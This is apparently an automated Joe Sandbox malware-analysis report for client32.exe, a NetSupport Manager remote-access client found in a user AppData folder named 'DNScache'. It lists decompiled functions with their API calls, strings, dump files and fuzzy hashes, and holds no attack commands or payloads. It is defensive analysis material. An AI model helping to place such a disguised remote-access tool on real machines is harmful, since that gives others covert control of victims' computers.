SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 111314C1
CreateFontIndirectA.GDI32(?), ref: 111314DF
CreateFontIndirectA.GDI32(?), ref: 111314F5
CreateFontIndirectA.GDI32(FFFFFFF0), ref: 1113150B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFontIndirect$InfoParametersSystem
String ID:
API String ID: 3386289337-0
Opcode ID: a7598eb20991dafe66751ef7ac6fd89089fa3da5bc14a11bae2e60fd8c64f6f5
Instruction ID: 89d4c56c772d2ba868f7edd94ef42f2d86b6d5ef79a9e20f35951e8b9b24d5ce
Opcode Fuzzy Hash: a7598eb20991dafe66751ef7ac6fd89089fa3da5bc14a11bae2e60fd8c64f6f5
Instruction Fuzzy Hash: 56015B719007189FD7A0DFA9CC84BDAF7F9AB84310F1042AAE519A6290DB706A88CF51

Function 110071A5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
SetFocus.USER32(?), ref: 11007353

Strings

edit, xrefs: 110072F1

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFocusWindow_malloc_memsetwsprintf
String ID: edit
API String ID: 1305092643-2167791130
Opcode ID: 94f3934005f36272ff9c373e1c74afce0ae45508d6e8a6b02473109ab4384187
Instruction ID: de71754c8f8b7a6d7854e6b919aecaa1dd8dfea79cc428f4c3780ea4bc6547d2
Opcode Fuzzy Hash: 94f3934005f36272ff9c373e1c74afce0ae45508d6e8a6b02473109ab4384187
Instruction Fuzzy Hash: F251A2B6A00606AFE741CFA4DC80BABB7E5FB88354F11856DF955C7340EA34E942CB61

Function 1103F1C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170COMMON

Download Yara Rule

APIs

Part of subcall function 110945B0: GetSystemMetrics.USER32(0000004C), ref: 110945BE
Part of subcall function 110945B0: GetSystemMetrics.USER32(0000004D), ref: 110945C7
Part of subcall function 110945B0: GetSystemMetrics.USER32(0000004E), ref: 110945CE
Part of subcall function 110945B0: GetSystemMetrics.USER32(00000000), ref: 110945D7
Part of subcall function 110945B0: GetSystemMetrics.USER32(0000004F), ref: 110945DD
Part of subcall function 110945B0: GetSystemMetrics.USER32(00000001), ref: 110945E5

GetRegionData.GDI32(?,00001000,?), ref: 1103F225

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

IsA(), xrefs: 1103F3AA, 1103F3DF
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 1103F3A5, 1103F3DA

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$DataErrorExitLastMessageProcessRegionwsprintf
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 1231476184-2270926670
Opcode ID: 1ee90390cde84d3df49d841f7e78e371a40b06f2b4a846bb4340604aa9f0e91b
Instruction ID: ed1dcef42c32e343aa2dc589496e1f180b2bdd3f857d0972ddb525fe63e2c745
Opcode Fuzzy Hash: 1ee90390cde84d3df49d841f7e78e371a40b06f2b4a846bb4340604aa9f0e91b
Instruction Fuzzy Hash: 03611AB5E002AA9FCB24CF54CC84ADDF3B5BF88344F0182D9E689A7244D6B46E85CF51

Function 1109F520 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHFOLDER(00000000,00008005,00000000,00000000,00000000), ref: 1109F5B1

Strings

Journal, xrefs: 1109F566
JournalPath, xrefs: 1109F561

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: Journal$JournalPath
API String ID: 1514166925-2350371490
Opcode ID: 78c34b45e83e0a7bb2dde4828659bbd823ba14e96ca335c8276407c8d75681a0
Instruction ID: 11b6dad32e2d97d970e3caf2bb25ef3de73850c8738cc32a1a68caa6727c68f0
Opcode Fuzzy Hash: 78c34b45e83e0a7bb2dde4828659bbd823ba14e96ca335c8276407c8d75681a0
Instruction Fuzzy Hash: CB415630A0469E9FC712CF288CA4BDAFFE4AF49704F1045E9D9599B340EA71A908C792

Function 110BD400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130comCOMMON

Download Yara Rule

APIs

Part of subcall function 11075920: GlobalAddAtomA.KERNEL32(NSMCoolbar), ref: 11075975
Part of subcall function 11075920: GetSysColor.USER32(0000000F), ref: 11075993
Part of subcall function 11075920: GetSysColor.USER32(00000014), ref: 1107599A
Part of subcall function 11075920: GetSysColor.USER32(00000010), ref: 110759A1
Part of subcall function 11075920: GetSysColor.USER32(00000008), ref: 110759A8
Part of subcall function 11075920: GetSysColor.USER32(00000016), ref: 110759AF

Part of subcall function 110AE510: InitializeCriticalSection.KERNEL32(00000154,00000000,110BD4D2,?,1105D28F,33E68B52,00000000,00000000,00000000,00000000,00000000,11181824,000000FF,?,1105D28F,?), ref: 110AE521

Part of subcall function 1110D180: GetCurrentThreadId.KERNEL32 ref: 1110D216
Part of subcall function 1110D180: InitializeCriticalSection.KERNEL32(-00000010,?,110309CC,00000001,00000000), ref: 1110D229
Part of subcall function 1110D180: InitializeCriticalSection.KERNEL32(111EB8A0,?,110309CC,00000001,00000000), ref: 1110D238
Part of subcall function 1110D180: EnterCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D24C
Part of subcall function 1110D180: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,110309CC), ref: 1110D272

OleInitialize.OLE32(00000000), ref: 110BD562

Part of subcall function 110CA1E0: InterlockedIncrement.KERNEL32(111E1E04), ref: 110CA1E8
Part of subcall function 110CA1E0: CoInitialize.OLE32(00000000), ref: 110CA20C

GlobalAddAtomA.KERNEL32(NSMCobrowse), ref: 110BD5B5

Strings

NSMCobrowse, xrefs: 110BD5B0

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ColorInitialize$CriticalSection$AtomGlobal$CreateCurrentEnterEventIncrementInterlockedThread
String ID: NSMCobrowse
API String ID: 2361268844-2243205248
Opcode ID: 1d3440fb9df4f0bdc7a29512e6af22b6d736a86bd0605d334c48b23a3323e1cd
Instruction ID: f8498fa3424b76f6b1bfbe617d0a0178eadd50e49733556c7aab17e5dab020ce
Opcode Fuzzy Hash: 1d3440fb9df4f0bdc7a29512e6af22b6d736a86bd0605d334c48b23a3323e1cd
Instruction Fuzzy Hash: 8C515678804B85DED721CFB9C58479AFBE4BF19308F50896EC89A83641DB747604CB62

Function 110091C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11009235
_memmove.LIBCMT ref: 11009286

Part of subcall function 11008D20: std::_Xinvalid_argument.LIBCPMT ref: 11008D3A

Strings

string too long, xrefs: 11009230

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: fe7fdde36dceac603a906d55c25aa5c734350282d9c6626d3c8168d1cedf9e85
Instruction ID: 8cb126bd188b80763a4beda36b0c12a195f1cb8be2bc8b06c5a52f773acf5c91
Opcode Fuzzy Hash: fe7fdde36dceac603a906d55c25aa5c734350282d9c6626d3c8168d1cedf9e85
Instruction Fuzzy Hash: D131E932F046159BF324CE9CE88099AF7EDEFA57A4B10492FE499C7640E771AC4083A1

Function 11039400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 1103942C

Part of subcall function 1115F6F6: __getptd.LIBCMT ref: 1115F714

_strtok.LIBCMT ref: 110394FC

Strings

; >, xrefs: 11039423, 110394F5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$__getptd
String ID: ; >
API String ID: 715173073-2207967850
Opcode ID: bbc94f631f8e7e2b05d2c764c72761ac017c9283598004b1a95ec2cfbf0a7f7a
Instruction ID: d83ba9c2d4c69d48193db01ac8315a4830e48a71bbfa0364c1bfb7f112e98cfd
Opcode Fuzzy Hash: bbc94f631f8e7e2b05d2c764c72761ac017c9283598004b1a95ec2cfbf0a7f7a
Instruction Fuzzy Hash: 88314D36D1425A6FDB11CEA48C40BDEBBE4DF8136AF154094DC54AB280FA34A90583E1

Function 1101F540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 1101F654

Part of subcall function 1115BC80: SetPropA.USER32(00000000,00000000,00000000), ref: 1115BC9E
Part of subcall function 1115BC80: SetWindowLongA.USER32(00000000,000000FC,1115B690), ref: 1115BCAF

Part of subcall function 1115AB90: SetPropA.USER32(?,?,?), ref: 1115ABE5

Strings

OnDestroy - delete m_WBFrameWnd, xrefs: 1101F61A
Chat Window Destroyed, xrefs: 1101F56B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Prop$DeleteLongObjectWindow
String ID: Chat Window Destroyed$OnDestroy - delete m_WBFrameWnd
API String ID: 2163963939-4047192309
Opcode ID: f532d7baad54d8461fc3ae6bb98b714d1c30314f4d0ae9ff85dbd9b13a971ef0
Instruction ID: 2ca5df1c83b7093fb112a314c8b8f23271f3bd6e0fbecad470d58f5d17d89803
Opcode Fuzzy Hash: f532d7baad54d8461fc3ae6bb98b714d1c30314f4d0ae9ff85dbd9b13a971ef0
Instruction Fuzzy Hash: 9831D1B9A00701AFE750DF65D880F6FF3A6EF85728F14451DE42A5B380DB75B8018B92

Function 1100F100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F11B

Part of subcall function 1115CAC3: std::exception::exception.LIBCMT ref: 1115CAD8
Part of subcall function 1115CAC3: __CxxThrowException@8.LIBCMT ref: 1115CAED
Part of subcall function 1115CAC3: std::exception::exception.LIBCMT ref: 1115CAFE

std::_Xinvalid_argument.LIBCPMT ref: 1100F132

Strings

string too long, xrefs: 1100F116, 1100F12D

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 8db46efe6db9436f2064baa0ab933277cc371c64cd769e299ef2e365ad4ce0f9
Instruction ID: 459ca286bfafb729ab8668ecd34245bbd8ac8787f22416be0bfd58d1cac74b78
Opcode Fuzzy Hash: 8db46efe6db9436f2064baa0ab933277cc371c64cd769e299ef2e365ad4ce0f9
Instruction Fuzzy Hash: AF119A337046155FF321DD5CE840B9AF7EDEF966A4F10066FF551CB680C7A1A80053A1

Function 111434E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

Part of subcall function 1113FFC0: GetCurrentProcess.KERNEL32(110290EF,?,11140213,?), ref: 1113FFCC
Part of subcall function 1113FFC0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\DNScache\client32.exe,00000104,?,11140213,?), ref: 1113FFE9

_memmove.LIBCMT ref: 11143551

Strings

Failed to get callstack, xrefs: 111434FD

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess_memmove
String ID: Failed to get callstack
API String ID: 4135527288-766476014
Opcode ID: b1fa4a1e9369a3d8da9c1891a1a729b24cd02a76f45cb66e96c3beb82d632514
Instruction ID: 85b5c54b8efb4bcb42ac9e0f5b9bc94840674145f5d524af23abd5ce505fb9d7
Opcode Fuzzy Hash: b1fa4a1e9369a3d8da9c1891a1a729b24cd02a76f45cb66e96c3beb82d632514
Instruction Fuzzy Hash: FD219875A041199BCB54DF64DC84BAEF7B4EF48318F10419AFC0DAB240DA30AE54CB91

Function 11141160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(7693795C,?,00000104,7693795C), ref: 11141187
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111411C6

Strings

:, xrefs: 1114119B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
